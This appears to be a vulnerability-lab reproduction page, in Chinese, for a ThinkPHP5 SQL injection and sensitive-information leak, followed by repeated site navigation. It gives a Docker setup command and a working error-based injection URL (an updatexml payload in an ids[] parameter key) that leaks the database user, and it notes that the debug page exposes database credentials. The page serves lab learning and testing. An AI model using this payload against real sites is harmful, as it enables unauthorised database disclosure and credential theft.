ThinkPHP5 SQL 注入漏洞 && 敏感信息泄露

漏洞描述

漏洞原理说明：

https://www.leavesongs.com/PENETRATION/thinkphp5-in-sqlinjection.html
https://xz.aliyun.com/t/125

环境搭建

运行环境：

docker-compose up -d

启动后，访问 http://your-ip/index.php?ids[]=1&ids[]=2，即可看到用户名被显示了出来，说明环境运行成功。

漏洞复现

访问 http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1，信息成功被爆出：

当然，这是一个比较鸡肋的 SQL 注入漏洞。但通过 DEBUG 页面，我们找到了数据库的账号、密码：

这又属于一个敏感信息泄露漏洞。

CMS漏洞

images

OA产品漏洞

images

Web应用漏洞

images

base

grafana

11.0.0

ollama

0.1.33

0.1.45

0.3.14

中间件漏洞

images

云安全漏洞

images

人工智能漏洞

images

其他漏洞

images

开发框架漏洞

images

开发语言漏洞

images

操作系统漏洞

images

数据库漏洞

images

网络设备漏洞

images

ThinkPHP5 SQL 注入漏洞 && 敏感信息泄露

漏洞描述

环境搭建

漏洞复现

images

images

images

grafana

11.0.0

ollama

0.1.33

0.1.45

0.3.14

images

images

images

images

images

images

images

images

images

ThinkPHP5 SQL 注入漏洞 && 敏感信息泄露 ​

漏洞描述 ​

环境搭建 ​

漏洞复现 ​

ThinkPHP5 SQL 注入漏洞 && 敏感信息泄露

漏洞描述

环境搭建

漏洞复现